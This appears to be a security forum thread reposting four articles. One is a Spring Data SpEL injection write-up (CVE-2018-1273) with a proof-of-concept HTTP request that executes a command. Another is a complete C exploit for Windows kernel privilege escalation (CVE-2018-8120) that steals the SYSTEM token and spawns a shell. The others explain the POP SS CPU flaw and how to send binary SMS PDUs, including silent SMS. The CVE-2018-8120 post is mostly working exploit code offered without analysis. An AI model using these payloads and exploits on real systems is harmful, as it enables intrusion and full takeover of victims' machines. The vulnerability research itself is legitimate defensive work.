http://gosecure.net/2018/05/17/beware-of-the-magic-spell-part-2-cve-2018-1260/
  13. Written by Philippe Arteau This February, we ran a Find Security Bugs scan on over at least one hundred components from the Spring Framework, including the core components (spring-core, spring-mvc) but also optional components (spring-data, spring-social, spring-oauth, etc.). From this exercise, we reported some vulnerabilities. In this blog post, we are going to give more details on a SpEL injection vulnerability. While some proof of concept code and exploitation details have already surfaced on Twitter, we will add a focus on how these vulnerabilities were found, followed by a thorough review of the proposed fix. Initial Analysis Our journey started when we noticed a suspicious expression evaluation in the MapDataBinder.java class, identified by the SPEL_INJECTION pattern as reported by Find Security Bugs. We discovered that the parameter propertyName came from a POST parameter upon form submission: public void setPropertyValue(String propertyName, @Nullable Object value) throws BeansException { if (!isWritableProperty(propertyName)) { // <---Validation here throw new NotWritablePropertyException(type, propertyName); } StandardEvaluationContext context = new StandardEvaluationContext(); context.addPropertyAccessor(new PropertyTraversingMapAccessor(type, conversionService)); context.setTypeConverter(new StandardTypeConverter(conversionService)); context.setRootObject(map); Expression expression = PARSER.parseExpression(propertyName); // Expression evaluation 1 2 3 4 5 6 7 8 9 public void setPropertyValue(String propertyName, @Nullable Object value) throws BeansException { if (!isWritableProperty(propertyName)) { // <---Validation here throw new NotWritablePropertyException(type, propertyName); } StandardEvaluationContext context = new StandardEvaluationContext(); context.addPropertyAccessor(new PropertyTraversingMapAccessor(type, conversionService)); context.setTypeConverter(new StandardTypeConverter(conversionService)); context.setRootObject(map); Expression expression = PARSER.parseExpression(propertyName); // Expression evaluation The sole protection against arbitrary expression evaluation appears to be the validation from the isWritableProperty method. Following the execution trace, it can be seen that the isWritableProperty method leads to the execution of getPropertyPath: @Override public boolean isWritableProperty(String propertyName) { try { return getPropertyPath(propertyName) != null; } catch (PropertyReferenceException e) { return false; } } 1 2 3 4 5 6 7 8 9 @Override public boolean isWritableProperty(String propertyName) { try { return getPropertyPath(propertyName) != null; } catch (PropertyReferenceException e) { return false; } } private PropertyPath getPropertyPath(String propertyName) { String plainPropertyPath = propertyName.replaceAll("\\[.*?\\]", ""); return PropertyPath.from(plainPropertyPath, type); } 1 2 3 4 5 private PropertyPath getPropertyPath(String propertyName) { String plainPropertyPath = propertyName.replaceAll("\\[.*?\\]", ""); return PropertyPath.from(plainPropertyPath, type); } We were about to review the PropertyPath.from() method in detail, but we realized a much easier bypass was possible: any value enclosed by brackets is removed and therefore the value is ignored. With this knowledge, the attack vector becomes clearer. We’re possibly able to submit a parameter name that would have the pattern “parameterName[T(malicious.class).exec(‘test’)]”. Building a Proof-of-concept An idea is nothing until it is put into action. When performing extensive code review, the creation of a proof of concept can sometimes be difficult. Luckily, it was not the case for this vulnerability. The first step was obviously constructing a vulnerable environment. We reused an example project located in spring-data-examples repository. The web project used an interface as a form which is required to reach this specific mapper. After identifying the form, we built the following request and sent it with an HTTP proxy. We were instantly greeted with the calculator spawn, confirming the exploitability of the module: POST /users?size=5 HTTP/1.1 Host: localhost:8080 Referer: http://localhost:8080/ Content-Type: application/x-www-form-urlencoded Content-Length: 110 Connection: close Upgrade-Insecure-Requests: 1 username=test&password=test&repeatedPassword=test&password<strong>[T(java.lang.Runtime).getRuntime().exec("calc")]</strong>=abc 1 2 3 4 5 6 7 8 9 POST /users?size=5 HTTP/1.1 Host: localhost:8080 Referer: http://localhost:8080/ Content-Type: application/x-www-form-urlencoded Content-Length: 110 Connection: close Upgrade-Insecure-Requests: 1 username=test&password=test&repeatedPassword=test&password<strong>[T(java.lang.Runtime).getRuntime().exec("calc")]</strong>=abc Simple proof of concept request spawning a calc.exe subprocess Reviewing The Fix A complete fix was made in the changeset associated to the bug id DATACMNS-1264. Here is why it can be considered really effective. While the attack vector presented previously relies on the side effect of a regex, another risk was also found in the implementation. The processed value was parsed twice; once for validation, and once again for execution. This is a subtle detail that is often overlooked when performing code review. An attacker could potentially exploit one subtitle difference between each implementation. This remains theoretical because we didn’t find any difference between both. The correction made by Pivotal also addresses this small double parsing risk that could have introduced a vulnerability in the future. In the first place, a more limited expression parser (SimpleEvaluationContext) was used. Then, a new validation of the types is integrated as the expression is loaded and executed. The isWritableProperty method was kept but the security of the mapper doesn’t rely on it anymore: public void setPropertyValue(String propertyName, @Nullable Object value) throws BeansException { [...] EvaluationContext context = SimpleEvaluationContext // .forPropertyAccessors(new PropertyTraversingMapAccessor(type, conversionService)) // NEW Type validation .withConversionService(conversionService) // .withRootObject(map) // .build(); Expression expression = PARSER.parseExpression(propertyName); 1 2 3 4 5 6 7 8 9 public void setPropertyValue(String propertyName, @Nullable Object value) throws BeansException { [...] EvaluationContext context = SimpleEvaluationContext // .forPropertyAccessors(new PropertyTraversingMapAccessor(type, conversionService)) // NEW Type validation .withConversionService(conversionService) // .withRootObject(map) // .build(); Expression expression = PARSER.parseExpression(propertyName); Is my application affected? Most Spring developers adopted Spring Boot to help dependency management. If this is your case, you should integrate the updates as soon as possible to avoid missing critical security patches, or growing your technical debt. If for any reason you must delay the last months’ updates, here are the specific conditions for the exploitation of this specific bug: Having spring-data-commons, versions prior to 1.13 to 1.13.10, 2.0 to 2.0.5, in your dependency tree; At least one interface is used as a form (for example UserForm in the spring-data-examples project); Impacted forms from previous conditions are also accessible to attackers. What’s next? As the title implies, there will be a second part to this article, as a very similar vulnerability was identified in Spring OAuth2. We wanted to keep both vulnerabilities separate regardless of the similarities to avoid confusion with the exploitation conditions and the different payloads. You might be wondering where these SpEL injections are likely to be present, aside from the Spring Framework itself. It is unlikely that you will find web application logic directly using the SpEL API. Our offensive security team only recalls one occurrence of such conditions. The most probable case is reviewing other Spring components similar to data-commons. Additional checks can easily be added to your automated scanning tools. If you are a Java developer or tasked with reviewing Java code for security, you could scan your application using Find Security Bugs, the tool we used to find this vulnerability. As implicitly demonstrated in this article, while this tool can be effective, the confirmation of the exploitability still requires a minimal understanding of the vulnerability class and a small analysis. We are hoping that this blog was informative to you. Maybe, you will find a similar vulnerability yourself soon. References https://pivotal.io/security/cve-2018-1273: Official publication by Pivotal https://github.com/find-sec-bugs/find-sec-bugs: Static Analysis tool used to find the vulnerability Sursa: http://gosecure.net/2018/05/15/beware-of-the-magic-spell-part-1-cve-2018-1273/
  14. cve-2018-8120 Details see: http://bigric3.blogspot.com/2018/05/cve-2018-8120-analysis-and-exploit.html #include <stdio.h> #include <tchar.h> #include <windows.h> #include <strsafe.h> #include <assert.h> #include <conio.h> #include <process.h> #include <winuser.h> #include "double_free.h" // Windows 7 SP1 x86 Offsets #define KTHREAD_OFFSET 0x124 // nt!_KPCR.PcrbData.CurrentThread #define EPROCESS_OFFSET 0x050 // nt!_KTHREAD.ApcState.Process #define PID_OFFSET 0x0B4 // nt!_EPROCESS.UniqueProcessId #define FLINK_OFFSET 0x0B8 // nt!_EPROCESS.ActiveProcessLinks.Flink #define TOKEN_OFFSET 0x0F8 // nt!_EPROCESS.Token #define SYSTEM_PID 0x004 // SYSTEM Process PID #pragma comment(lib,"User32.lib") typedef struct _FARCALL { DWORD Offset; WORD SegSelector; } FARCALL, *PFARCALL; FARCALL Farcall = { 0 }; LONG Sequence = 1; LONG Actual[3]; _NtQuerySystemInformation NtQuerySystemInformation; LPCSTR lpPsInitialSystemProcess = "PsInitialSystemProcess"; LPCSTR lpPsReferencePrimaryToken = "PsReferencePrimaryToken"; FARPROC fpPsInitialSystemProcess = NULL; FARPROC fpPsReferencePrimaryToken = NULL; NtAllocateVirtualMemory_t NtAllocateVirtualMemory; void PopShell() { STARTUPINFO si = { sizeof(STARTUPINFO) }; PROCESS_INFORMATION pi; ZeroMemory(&si, sizeof(si)); si.cb = sizeof(si); ZeroMemory(&pi, sizeof(pi)); CreateProcess("C:\\Windows\\System32\\cmd.exe", NULL, NULL, NULL, 0, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi); } FARPROC WINAPI KernelSymbolInfo(LPCSTR lpSymbolName) { DWORD len; PSYSTEM_MODULE_INFORMATION ModuleInfo; LPVOID kernelBase = NULL; PUCHAR kernelImage = NULL; HMODULE hUserSpaceKernel; LPCSTR lpKernelName = NULL; FARPROC pUserKernelSymbol = NULL; FARPROC pLiveFunctionAddress = NULL; NtQuerySystemInformation = (_NtQuerySystemInformation) GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQuerySystemInformation"); if (NtQuerySystemInformation == NULL) { return NULL; } NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &len); ModuleInfo = (PSYSTEM_MODULE_INFORMATION)VirtualAlloc(NULL, len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); if (!ModuleInfo) { return NULL; } NtQuerySystemInformation(SystemModuleInformation, ModuleInfo, len, &len); kernelBase = ModuleInfo->Module[0].ImageBase; kernelImage = ModuleInfo->Module[0].FullPathName; lpKernelName = (LPCSTR)ModuleInfo->Module[0].FullPathName + ModuleInfo->Module[0].OffsetToFileName; hUserSpaceKernel = LoadLibraryExA(lpKernelName, 0, 0); if (hUserSpaceKernel == NULL) { VirtualFree(ModuleInfo, 0, MEM_RELEASE); return NULL; } pUserKernelSymbol = GetProcAddress(hUserSpaceKernel, lpSymbolName); if (pUserKernelSymbol == NULL) { VirtualFree(ModuleInfo, 0, MEM_RELEASE); return NULL; } pLiveFunctionAddress = (FARPROC)((PUCHAR)pUserKernelSymbol - (PUCHAR)hUserSpaceKernel + (PUCHAR)kernelBase); FreeLibrary(hUserSpaceKernel); VirtualFree(ModuleInfo, 0, MEM_RELEASE); return pLiveFunctionAddress; } LONG WINAPI VectoredHandler1( struct _EXCEPTION_POINTERS *ExceptionInfo ) { HMODULE v2; if (ExceptionInfo->ExceptionRecord->ExceptionCode == 0xE06D7363) return 1; v2 = GetModuleHandleA("kernel32.dll"); ExceptionInfo->ContextRecord->Eip = (DWORD)GetProcAddress(v2, "ExitThread"); return EXCEPTION_CONTINUE_EXECUTION; } DWORD FindAddressByHandle( HANDLE hCurProcess ) { PSYSTEM_HANDLE_INFORMATION pSysHandleInformation = new SYSTEM_HANDLE_INFORMATION; DWORD size = 0xfff00; DWORD needed = 0; DWORD dwPid = 0; NTSTATUS status; pSysHandleInformation = (PSYSTEM_HANDLE_INFORMATION)malloc(size); memset(pSysHandleInformation, 0, size); status = NtQuerySystemInformation(SystemHandleInformation, pSysHandleInformation, size, &needed); // pSysHandleInformation = (PSYSTEM_HANDLE_INFORMATION)new BYTE[needed]; // status = NtQuerySystemInformation(SystemHandleInformation, pSysHandleInformation, needed, 0); // if (!status) // { // if (0 == needed) // { // return -1;// some other error // } // // The previously supplied buffer wasn't enough. // delete pSysHandleInformation; // size = needed + 1024; // // if (!status) // { // // some other error so quit. // delete pSysHandleInformation; // return -1; // } // } dwPid = GetCurrentProcessId(); for (DWORD i = 0; i < pSysHandleInformation->dwCount; i++) { SYSTEM_HANDLE& sh = pSysHandleInformation->Handles[i]; if (sh.dwProcessId == dwPid && (DWORD)hCurProcess == (DWORD)sh.wValue) { return (DWORD)(sh.pAddress); } } return -1; } HANDLE hDesHandle = NULL; DWORD dwCurAddress; PACCESS_TOKEN pToken; DWORD *v1; DWORD v2, *p2; DWORD i; PVOID Memory = NULL; DWORD ori_ret = 0; void __declspec(naked) EscapeOfPrivilege(HANDLE hCurProcess) { __asm { push ebp mov ebp,esp } //v1 = (DWORD *)&hCurProcess; if (DuplicateHandle(hCurProcess, hCurProcess, hCurProcess, &hDesHandle, 0x10000000u, 0, 2u)) { dwCurAddress = FindAddressByHandle(hDesHandle); if ( dwCurAddress == -1 ) { printf("Find Current Process address Failed!\n"); system("pause"); //exit(-1); } printf("addrProcess:0x%08x\n", dwCurAddress); v1 = (DWORD *)dwCurAddress; __asm{ push ecx; save context lea ecx, Farcall call fword ptr[ecx] mov eax, [esp] mov [ebp-0x2c], eax add esp,4 } p2 = &v2; p2 = *(DWORD**)fpPsInitialSystemProcess; pToken = ((PsReferencePrimaryToken_t)fpPsReferencePrimaryToken)(p2); // //// walk through token offset // if ((*p2 & 0xFFFFFFF8) != (unsigned long)pToken) // { // do // { // i = p2[1]; // ++p2; // ++v1; // } while ((i & 0xFFFFFFF8) != (unsigned long)pToken); // } Memory = (PVOID)(ULONG)((char*)dwCurAddress + 0xf8); *(PULONG)Memory = *(PULONG)((char*)p2 + 0xf8); __asm { mov eax, [ebp-0x2c] push eax mov eax, PopShell push eax retf } } } int fill_callgate(int a1, int a2, int a3) { int *v3; // edx int v4; // ecx signed int v5; // esi v3 = (int *)(a1 + 4); v4 = a2 + 352; v5 = 87; do { *v3 = v4; v4 += 8; v3 += 2; --v5; } while (v5); if (!a3) { *(DWORD *)(a1 + 96) = 0xC3; // ret *(WORD *)(a1 + 76) = a2 + 0x1B4; // address low offset *(WORD *)(a1 + 82) = (unsigned int)(a2 + 0x1B4) >> 16; // address high offset *(WORD *)(a1 + 78) = 0x1A8; // segment selector *(WORD *)(a1 + 80) = 0xEC00u; *(WORD *)(a1 + 84) = 0xFFFFu; *(WORD *)(a1 + 86) = 0; *(BYTE *)(a1 + 88) = 0; *(BYTE *)(a1 + 91) = 0; *(BYTE *)(a1 + 89) = 0x9Au; *(BYTE *)(a1 + 90) = 0xCFu; } return 1; } void main() { NTSTATUS ntStatus; PVOID pMappedAddress = NULL; SIZE_T SectionSize = 0x4000; DWORD_PTR dwArg1; DWORD dwArg2; PVOID pMappedAddress1 = NULL; RtlAdjustPrivilege_t RtlAdjustPrivilege; DWORD dwPageSize = 0; char szGDT[6]; struct _SYSTEM_INFO SystemInfo; HANDLE hCurThread = NULL, hCurProcess = NULL; HMODULE hNtdll = NULL; PVOID dwAllocMem = (PVOID)0x100; PVOID pAllocMem; HWINSTA hWndstation; DWORD temp; fpPsInitialSystemProcess = KernelSymbolInfo(lpPsInitialSystemProcess); fpPsReferencePrimaryToken = KernelSymbolInfo(lpPsReferencePrimaryToken); if ( fpPsInitialSystemProcess && fpPsReferencePrimaryToken ) { AddVectoredExceptionHandler(1u, VectoredHandler1); hCurThread = GetCurrentThread(); dwArg1 = SetThreadAffinityMask(hCurThread, 1u); printf("thread prev mask : 0x % 08x\n", dwArg1); __asm { sgdt szGDT; } temp = *(int*)(szGDT + 2); printf("addrGdt:%#p\n", *(int*)(szGDT + 2)); GetSystemInfo(&SystemInfo); dwPageSize = SystemInfo.dwPageSize; hNtdll = GetModuleHandle("ntdll.dll"); NtAllocateVirtualMemory = (NtAllocateVirtualMemory_t)GetProcAddress(hNtdll, "NtAllocateVirtualMemory"); if (!NtAllocateVirtualMemory) { printf("\t\t[-] Failed Resolving NtAllocateVirtualMemory: 0x%X\n", GetLastError()); system("pause"); //exit(-1); } RtlAdjustPrivilege = (RtlAdjustPrivilege_t)GetProcAddress(hNtdll, "RtlAdjustPrivilege"); if (!NtAllocateVirtualMemory) { printf("\t\t[-] Failed Resolving RtlAdjustPrivilege: 0x%X\n", GetLastError()); system("pause"); //exit(-1); } hCurProcess = GetCurrentProcess(); ntStatus = NtAllocateVirtualMemory(hCurProcess, &dwAllocMem, 0, (PULONG)&dwPageSize, 0x3000, 4); if (ntStatus) { printf("Alloc mem Failed! Error Code: 0x%08x!\n", ntStatus); system("pause"); //exit(-1); } pAllocMem = operator new(0x400); memset(pAllocMem, 0, 0x400u); *(DWORD *)(*(DWORD*)dwAllocMem + 0x14)= *(DWORD*)pAllocMem; *(DWORD *)(*(DWORD*)dwAllocMem + 0x2C) = temp+0x154; fill_callgate((int)pAllocMem, temp, 0); //*(DWORD *)(v22 + 20) = *(DWORD*)pAllocMem; //*(DWORD *)(v22 + 44) = v22[1] + 340; printf("ready to trigger!\n"); hWndstation = CreateWindowStationW(0, 0, 0x80000000, 0); if ( hWndstation ) { if (SetProcessWindowStation(hWndstation)) { __asm { //int 3 push esi mov esi, pAllocMem push eax push edx push esi push esi mov eax,0x1226 mov edx, 7FFE0300h call dword ptr[edx] pop esi pop esi pop edx pop eax pop esi } Farcall.SegSelector = 0x1a0; EscapeOfPrivilege( hCurProcess ); PopShell(); } else { int n = GetLastError(); printf("step2 failed:0x%08x\n", n); system("pause"); //exit(-1); } } else { int n = GetLastError(); printf("step1 failed:0x%08x\n", n); system("pause"); //exit(-1); } } else { printf("Init Symbols Failed! \n"); system("pause"); //exit(-1); } } Sursa: https://github.com/bigric3/cve-2018-8120
  15. Dissecting the POP SS Vulnerability Author: Joe Darbyshire No Comments Share: The newly uncovered POP SS vulnerability takes advantage of a widespread misconception about behaviour of pop ss or mov ss instructions resulting in exceptions when the instruction immediately following is an interrupt. It is a privilege escalation, and as a result it assumes that the attacker has some level of control over a userland process (ring 3). The attack has the potential to upgrade their privilege level to ring 0 giving them complete control of the target system. By jailing the guest OS using a hypervisor which operates at a hardware-enforced layer below ring 0 on the machine, PCs protected by Bromium are immune to threats of this nature. Today we are dissecting the pop ss or mov ss vulnerability. To understand the attack, you must first be familiar with CPU interrupts and exceptions. CPU interrupts and exceptions Interrupts and exceptions are used by the CPU to interrupt the currently executing program in order to handle unscheduled events such as the user pressing a key or moving the mouse. Exceptions also interrupt the currently running process, but in response to an event (usually an error) resulting from the currently executing instruction. The need for these two CPU features stems from the fact that these events are not predetermined and must be dealt with as and when they occur, rather than according to a predefined schedule. When an interrupt or exception is triggered, it is down to the OS to decide how to handle it. There are operating system routines for each type of interrupt which can be triggered by the CPU to determine, from the current state information, how the instruction should be dealt with. The pop ss vulnerability takes advantage of a bug in OS routines for dealing with interrupts caused by unexpected #db (debug) exceptions triggered in the kernel. The root of the vulnerability Under normal circumstances, CPU exceptions are triggered immediately upon retirement of the instruction that caused them. However, with pop ss and mov ss instructions this is deemed unsafe since they are used as part of sequence such as the following to switch stacks: mov ss, [rax] mov rsp, rbp If mov ss, [rax] causes an exception, it would be handled with an invalid stack pointer since the stack segment offset has been changed but the new stack pointer has not yet been set. Consequently, the design decision was made to trigger the exception on retirement of the instruction immediately following the offending instruction to allow the stack pointer to be set correctly. Whilst this solved the issue of exception handling with an invalid stack pointer, it had the unforeseen side effect of creating an unexpected state for the OS if the next instruction was itself an interrupt such as in the following case: mov ss, [rax] int 0x1 In this scenario, due to the context switch caused by int 0x1 which is executed before the exception handler, the handler will be triggered from ring 0 despite being caused by ring 3 code. Since OS developers have been operating under the assumption that ring 0 code exclusively will be responsible for exceptions triggered within the kernel, this causes them to potentially mishandle this edge case whereby an exception is triggered from within the kernel by a userland process. The paper published describes one way in which the attacker can use this scenario to manipulate kernel memory in unintended ways by tricking the kernel into operating on userland data structures when handling the exception. In the kernel, the gs segment register is used as a pointer to various kernel related data structures. Following a system call, the kernel calls swapgs to set the gs register to the kernel specific value, and, upon exit from the kernel, swapgs is called again to return it to its original userland value. However, in our case, an exception was triggered before swapgs could be executed by the kernel so it is still using a user defined gs value upon triggering the exception from ring 0. In handling the interrupt, vulnerable OSs determine whether swapgs needs to be called based on the location which the interrupt was fired from. If the exception was triggered from the kernel, the OS makes the (incorrect) assumption that, swapgs has already been called when context was first switched to the kernel, so it attempts to handle it without executing this instruction first. As a result the exception is handled using a user defined gs register value creating the opportunity to corrupt kernel memory in a manner which allows for arbitrary code execution. Bromium immunity Bromium VMs are immune to escape using this kind of attack since user memory along with kernel memory is jailed within the hypervisor and specific to each instance. As a result, nothing is gained even when an attacker gains complete control of the kernel within a VM – there is no sensitive information to steal and no way for an attacker to propagate or persist. There are certain kinds of hypervisors that are potentially vulnerable to this attack including Xen legacy PV VMs. This is because the architecture runs the hypervisor at ring 0, whilst the kernel and userspace both operate as ring 3 processes communicating with one another via the hypervisor. As a result, if the hypervisor mishandles an exception, this allows for the attacker to obtain ring 0 on the physical machine effectively escaping the VM. The Bromium hypervisor is protected from this threat since it operates at a hardware-enforced layer which sits behind ring 0 for all the VMs on a system. Learn more about the Bromium Secure Platform. Sursa: https://blogs.bromium.com/dissecting-pop-ss-vulnerability/
  16. Binary SMS - The old backdoor to your new thing Despite being older than many of its users, Short Messaging Service (SMS) remains a very popular communications medium and is increasingly found on remote sensors, critical infrastructure and vehicles due to an abundance of cellular coverage. To phone users, SMS means a basic 160 character text message. To carriers and developers it offers a much more powerful range of options, with sizes up to a theoretical maximum of 35KB and a myriad of binary payloads detailed within the GSM 03.40 specification. Carriers make use of these advanced features for remote management. They can send remote command SMS messages to trigger and interact with hidden applications on their devices without the user's consent. Law Enforcement can track a phone with 'silent' SMS messages designed not to alert the user. SMS technology underpins a lot of Mobile Device Management (MDM) frameworks. The coupling between a smart-phone’s software and it's radio is a lot closer than you might think. SMS messages containing malicious payloads can be targeted at listening applications on a device and from there processed by the target software. If the software is poorly written, remote memory corruption and arbitrary code execution are possible.The vehicle for getting a payload to a target application on a phone (or smart device) is the Protocol Data Unit (PDU) which contains framed user data which is forwarded, without inspection, to a logical port on the operating system – with the privileges of the radio (System normally). This is comparable to a computer running open services on the internet without a firewall. Legalities and options The GSM spectrum is very expensive private property. You may not transmit (or even receive) in GSM bands without permission. In the UK, it is an offence under the Wireless Telegraphy Act to transmit on licensed bands without permission and furthermore intercepting GSM without a warrant is an offence under the Regulation of Investigatory Powers Act.You should apply for a licence (example from OFCOM below) before commencing GSM testing and will also need a faraday cage to suppress radiation. (For these reasons, GSM interfaces get less scrutiny than TCP/IP for example). If you feel compelled to write another OpenBTS blog, we recommend not publishing screenshots that suggest you broke the law as this would be very irresponsible and could compromise your company's reputation. For users on a budget, you can send SMS PDUs as a regular subscriber over an existing public carrier using a GSM modem but you must check your carrier's terms and conditions first.Using Vodafone's Terms and Conditions for example, customers are not allowed to use the service to break the law or use automated means to send texts. Scripting your testing to attack someone else's phone would definitely not be allowed but manually sending an SMS PDU (or two) to test a phone you own could be OK. It is up to you to satisfy yourself that you are compliant with your carrier's terms and conditions. SMS PDU mode There are two defined modes for SMS: Text and raw PDU mode. In PDU mode, the entire frame can be defined which opens up a huge attack surface in the form of the (user defined) encapsulating fields as well as the prospect for a malicious payload to be received by a target application on the phone. The beauty of PDU mode is a poorly written software application on a handset can be exploited remotely.This is made possible through the Protocol Data Unit (PDU) which allows large messages to be fragmented as Concatenated SMS (C-SMS) and crucially from a security aspect, messages to be addressed to different applications on a mobile using port numbers akin to TCP/IP. WAP push is a popular example of a binary PDU. A typical WAP push message from your carrier may contain GPRS or MMS configuration settings which after reassembly appears as a special message which requests user permission to define new network configuration values defined within an XML blob. WAP might well be a legacy protocol, but it's a powerful legacy protocol which can be used for many malicious purposes. Displaying a text message is optional. Some SMS messages can be sent to your handset without your knowledge and will never appear in your inbox (a silent SMS). Message display can also be forced by setting the 'Class 0' type (flash SMS) which will cause the SMS to display in the foreground without user interaction. This public alerting system is used in the US by the emergency services and is typically delivered as a cell broadcast whereby all subscribers attached to a tower receive the SMS simultaneously. SMS test environment options When testing SMS PDUs you can do it in your own private test environment with a GSM test licence or over a public carrier. A private environment has several key advantages: Cost – Sending lots of SMS messages can be expensive, especially once you start concatenating messages. Control – SMS messages on a busy carrier are subject to unpredictable delays and contractual restrictions Debugging – a private environment will allow you to monitor messages and responses on the air interface which is essential for early testing. A public carrier is (potentially) much cheaper and quicker to use, with just a 3G dongle, but forfeits control and is subject to the terms and conditions of your carrier which may not allow testing with their network. Private SMS test environment To inspect SMS PDUs on the air interface a GSM base station is required. One of the best known open source base stations is OpenBTS, for which there are many setup tutorials for many different platforms. In our experience of OpenBTS it is indeed quick to setup but it's PDU handling needs work. It has a Command Line Interface (CLI) for sending both types of SMS but we found the PDU validation routine to be buggy for Mobile Terminated (MT) SMS messages which is exactly what we're interested in. After spending a long time nailing down the validation issue (and judging by the developer's comments and try/catch blocks we weren't alone) we happened across YateBTS which we found to have better support for testing MT-SMS. YateBTS can be installed on a Raspberry Pi 3 which gives the advantage of having it in a small portable form so you can place it inside the faraday cage for example so it can be accessed by many users on a LAN. You should keep the distance between the radio and the host computer as short as possible and do not daisy chain USB cables as the clock requirements are so precise you will experience stability issues. Kit list All prices are approximate. A cellar or room with double concrete walls could be used instead of a faraday cage providing your licensing authority are satisfied it will suppress emissions sufficiently (>60dB). Twelve inch concrete blocks have 35dB of attenuation at 900MHz. Ettus USRP B200 with 2 900MHz antennas: £600 Ettus GPS disciplined oscillator (TCXO) with GPS antenna: £500 Ramsey STE3000 RF enclosure: £1500 Raspberry Pi 3: £35 YateBTS: Free Wireshark: Free Osmo-trx driver: Free Ettus UHD library: Free Total: £2635 Building Open source BTS tutorials age off quicker than a Gentoo kernel due to the fast moving world of open source GSM and the dynamic dependencies required. We recommend focusing on learning the standard and concepts rather than particular packages but if you want a recent tutorial, you'll find a comprehensive tutorial for an open source BTS (Yate) on a Pi here. OpenBTS and YateBTS don't prescribe hardware or drivers so you can use it with multiple radios, providing they support the precise timing requirements of a GSM base station which are for an error rate of 0.05 ppm. This is more relaxed for pico cells at 0.1ppm. If you attempt to stand up a BTS without a precision clock source you will find it is unstable. You may get lucky and get your handset to see the network and attach to it briefly at close range but it won't last and will quickly fall over once you commence testing. A precision clock is essential. The GPS unit we used requires an external GPS receive antenna and does take a while to acquire a fix (Green LED) initially. A key configuration change for using a low power PC like a Pi is the third party radio driver which must be defined within ../etc/yate/ybts.conf. We had success with the official Ettus UHD driver but opted for the ARM friendly osmo-trx transceiver compiled with UHD 003.010 defined as Path=./osmo-trx and homed at ../lib/yate/server/bts/osmo-trx Testing Understanding the many unique aspects of the GSM air interface is not necessary to perform SMS testing but having a basic understanding of paging will help. Getting your handset to attach initially is half the battle, after that the rest is quite straightforward and very much in the realm of computing not RF. The gsmtap PCAP output is an invaluable tool in testing your setup and monitoring traffic on the air interface. To use it, enter Yate's web UI and update the monitoring IP to your own, check the gsmtap box, then spin up wireshark on your external interface. This feature can be used remotely which is convenient for users on a LAN. The gsmtap UDP packets for both the uplink and downlink will be sent blindly to port 4729 on your host and will likely elicit ICMP port closed responses. A healthy BTS will be broadcasting data frames constantly on its Broadcast Channel (BCCH) and subscribers will be able to attach to it providing their International Mobile Subscriber Identifier (IMSI) is allowed under the access rules. When initiating an SMS, the first thing the BTS does is page the handset on the Common Control Channel (CCCH) to test for it's presence. The handset should respond in kind after which the BTS will send the SMS PDU(s) on the Standalone Dedicated Control Channel (SDCCH). In the screenshot below, a concatenated 3 part SMS has been sent over our YateBTS by subscriber 12345. Only when the final fragment arrives is it reassembled into a complete SMS. Each fragment is acknowledged separately which is helpful for debugging concatenation issues. Wireshark filters Only GSM: gsmtap && !icmp Only paging activity: gsmtap.chan_type == CCCH && !icmp Only SMS (Uplink / Downlink): gsm_a.dtap.msg_sms_type == 0x01 Only SMS from originator 12345: gsm_sms.tp-oa == "12345" Only SMS ack from subscriber: gsm_a.rp.msg_type == 0x02 To send a PDU with YateBTS you can either use the dedicated script in the web interface at /nib_web/custom_sms.php or the more flexible telnet interface on TCP port 5038.Both methods require the IMSI of the recipient which you can find from the registered subscribers list or by monitoring handset registration and paging on the air interface.We wrapped the telnet interface with our own PHP script using the socket API like so: // PHP $cmd="control custom_sms called=$imsi $type=rpdu";$socket = fsockopen("localhost", "5038", $errno, $errstr); fputs($socket, "$cmd "); With our SMS web API we were not only able to let other researchers on the LAN send PDUs but also de-skill the knowledge required to perform SMS testing. The PDU sent on the air interface looks different than the PDU sent over the public network because of differences in SMS-DELIVER (BTS > MS) and SMS-SUBMIT (MS > BTS) formats. To learn more about PDUs see the PDU section. Public SMS test environment PDU testing doesn't have to be expensive. You can send custom PDUs using any GSM device on which you can issue AT modem commands. A practical solution is a 3G dongle such as the Huawei E3533 or even a basic development board such as the Adafruit FONA series. Using the £20 Huawei E3533 as an example, you will need to ensure the device is connected in GSM modem mode, not Ethernet adapter or mass storage etc. To do this with Linux issue a usb_modeswitch command as follows: usb_modeswitch -v 0x12d1 -p 0x1f01 -V 0x12d1 -P 0x14db -M "55534243123456780000000000000011063000000100010000000000000000" More device specific commands are available in the forum at http://www.draisberghof.de/usb_modeswitch/bb/ Once you have a /dev/ttyUSBx, connect to it with a serial console like minicom and issue the following Hayes AT commands:AT+CMGF=0 to place the modem into PDU mode. AT+CMGS=n to prepare to send a PDU of length n bytes, followed by the PDU itself in hexadecimal form. To obtain the length take the total number of hexadecimal characters, divide it by 2 to get bytes then subtract 8 bytes for the recipient's number. Tip: Hit Ctrl-Z to send the PDU. Do not hit enter. The serial commands are easily scripted using Python's serial library. Before firing up your Python interpreter, bear in mind your carrier's terms and conditions regarding automated sending of SMS messages. So long as you are in control of each message's transmission you should be ok. Here's a basic Python client for sending a PDU via a GSM modem. # Python ser = serial.Serial(tty, 115200, timeout=5)ser.write('AT ')if "OK" in ser.read(64): print "CONNECTED TO MODEM OK" ser.write("AT+CMGF=0 ") # PDU mode ser.write("AT+CMGS=%d " % ((len(pdu)/2)-8)) time.sleep(1) ser.write('%s' % pdu) print ser.read(64) else: print "MODEM FAILURE"ser.close() Protocol Data Units (PDUs) The GSM 03.40 standard describes Transfer Protocol Data Units (TPDUs) which are used to convey an SMS. The TPDU is used throughout the messages journey across the telecoms network. There are different types of SMS PDUs. PDUs from the handset to the network are SMS-SUBMIT and could start with byte 0x01, PDUs from the network down to the handset are SMS-DELIVER and could start with byte 0x00 and are normally longer due to the addition of a 7 octet date service centre time stamp. The first byte is a bitmask of multiple flags and contains a lot of information. PDU encoding is complicated but thankfully there are many free online encoders and programming libraries like Python's smspdu to validate your PDU against the GSM 03.40 standard. Before jumping straight in and using one it's important you understand some key fields and the significant difference between DELIVER and SUBMIT PDUs as many online decoders only do SUBMIT and not DELIVER. We've tested lots and recommend Python's smspdu library. Example validation of a PDU: python -m smspdu [PDU] The Protocol Identifier (PID) field refers to the application layer protocol used. The default value 0x00 is used for plain short messages. Setting the PID to 0x64 would be a silent SMS known as a 'type 0' SMS which all handsets receive and must acknowledge without indicating its receipt to the user. As previously mentioned, this has been used by law enforcement to actively 'ping' a handset on a network. User data headers and concatenation When you want to target an application on a phone you need to define the destination port within the User Data Header (UDH) 